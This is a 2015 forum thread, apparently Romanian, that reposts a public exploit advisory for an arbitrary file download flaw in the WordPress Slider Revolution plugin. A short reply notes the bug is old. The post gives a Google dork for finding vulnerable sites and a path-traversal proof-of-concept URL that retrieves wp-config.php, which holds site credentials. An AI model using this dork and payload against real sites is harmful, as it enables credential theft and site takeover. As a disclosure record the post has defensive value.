Aerosol Posted March 30, 2015 Report Posted March 30, 2015 # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability# Exploit Author : Claudio Viviani# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380# Software Link : Premium plugin# Dork Google: revslider.php "index of"# Date : 2014-07-24# Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox####################### DescriptionWordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability####################### PoChttp://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php#####################Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww#####################Source Quote
UnixDevel Posted March 30, 2015 Report Posted March 30, 2015 e destul de vechi ..chiar stiam de el:) ca am lucrat cu compania care la desc Quote